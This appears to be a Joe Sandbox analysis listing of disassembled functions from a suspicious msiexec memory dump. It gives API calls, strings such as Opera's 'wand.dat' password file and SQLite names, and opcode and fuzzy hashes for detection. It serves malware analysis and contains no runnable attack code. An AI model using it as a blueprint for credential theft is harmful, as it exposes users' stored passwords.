                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1889144086-0
                                                                                                                                                • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1661045500-0
                                                                                                                                                • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                                                Strings
                                                                                                                                                • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                • API String ID: 1297977491-2063813899
                                                                                                                                                • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040560C
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                • String ID: *.*$dat$wand.dat
                                                                                                                                                • API String ID: 2618321458-1828844352
                                                                                                                                                • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1549203181-0
                                                                                                                                                • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00412057
                                                                                                                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3550944819-0
                                                                                                                                                • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • free.MSVCRT ref: 0040F561
                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$free
                                                                                                                                                • String ID: g4@
                                                                                                                                                • API String ID: 2888793982-2133833424
                                                                                                                                                • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: @
                                                                                                                                                • API String ID: 3510742995-2766056989
                                                                                                                                                • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                                                                • memset.MSVCRT ref: 0040AF18
                                                                                                                                                • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1865533344-0
                                                                                                                                                • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                                                                                • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                                                                                • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004144E7
                                                                                                                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                  • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                • memset.MSVCRT ref: 0041451A
                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1127616056-0
                                                                                                                                                • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                • memset.MSVCRT ref: 0042FED3
                                                                                                                                                • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                • String ID: sqlite_master
                                                                                                                                                • API String ID: 438689982-3163232059
                                                                                                                                                • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3917621476-0
                                                                                                                                                • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 822687973-0
                                                                                                                                                • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                • malloc.MSVCRT ref: 00417459
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                                                                                                                • free.MSVCRT ref: 0041747F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2605342592-0
                                                                                                                                                • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2678498856-0
                                                                                                                                                • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$Item
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3888421826-0
                                                                                                                                                • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00417B7B
                                                                                                                                                • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3727323765-0
                                                                                                                                                • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040F673
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
